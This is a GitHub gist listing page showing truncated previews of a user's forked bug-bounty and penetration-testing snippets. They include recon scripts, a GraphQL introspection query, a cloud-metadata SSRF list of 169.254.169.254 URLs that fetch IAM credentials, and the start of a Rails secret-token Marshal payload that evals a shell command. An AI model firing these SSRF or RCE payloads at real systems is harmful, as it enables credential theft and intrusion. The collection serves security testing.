Skip to content

Instantly share code, notes, and snippets.

View shamrocksu88's full-sized avatar
🎯
Focusing

Shunmugha Sundaram shamrocksu88

🎯
Focusing
View GitHub Profile
@shamrocksu88
shamrocksu88 / gist:89a938e64a75551b5a70d5f03f66daa7
Created May 25, 2020 13:59 — forked from tillson/gist:620e8ef87bc057f25b0a27c423433fda
Decode Base64 strings in a git repo's commit history
from pydriller import RepositoryMining
import re
import base64
foundSet = set()
for commit in RepositoryMining('./').traverse_commits():
for mod in commit.modifications:
if mod.source_code_before != None:
regex = re.findall(r"<text encoding=\"base64\">[^>]+</text>", mod.source_code_before)
for result in regex:
This file has been truncated, but you can view the full file.
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
@shamrocksu88
shamrocksu88 / built-in-tools.md
Created February 20, 2020 07:00 — forked from kevinweber/built-in-tools.md
Collection of AEM Links, Commands & Tips / Cheat Sheet

Web Consoles & Tools

@shamrocksu88
shamrocksu88 / revip.py
Created November 28, 2019 05:04 — forked from ayoubfathi/revip.py
Using YouGetSignal API to get domains hosted on the same IP - Reverse IP
import requests
import json
import sys
import argparse
_strip = ['http://', 'https://', 'www']
G = '\033[92m'
Y = '\033[93m'
#!/usr/bin/sudo ruby
#
# revealer.rb -- Deobfuscate GHE .rb files.
#
# This is simple:
# Every obfuscated file in the GHE VM contains the following code:
#
# > require "ruby_concealer.so"
# > __ruby_concealer__ "..."
@shamrocksu88
shamrocksu88 / introspection-query.graphql
Created March 27, 2019 00:08 — forked from craigbeck/introspection-query.graphql
Introspection query for GraphQL
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
@shamrocksu88
shamrocksu88 / cloud_metadata.txt
Created December 28, 2018 03:07 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
@shamrocksu88
shamrocksu88 / second-order.py
Created December 28, 2018 01:21 — forked from PatrikHudak/second-order.py
Second-order subdomain takeover
# coding=utf-8
# python3
from urllib.parse import urlparse
import requests
import urllib3
from bs4 import BeautifulSoup
@shamrocksu88
shamrocksu88 / crt.sh
Created November 9, 2018 01:26 — forked from 1N3/crt.sh
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
"\x04\x08" +
"o" +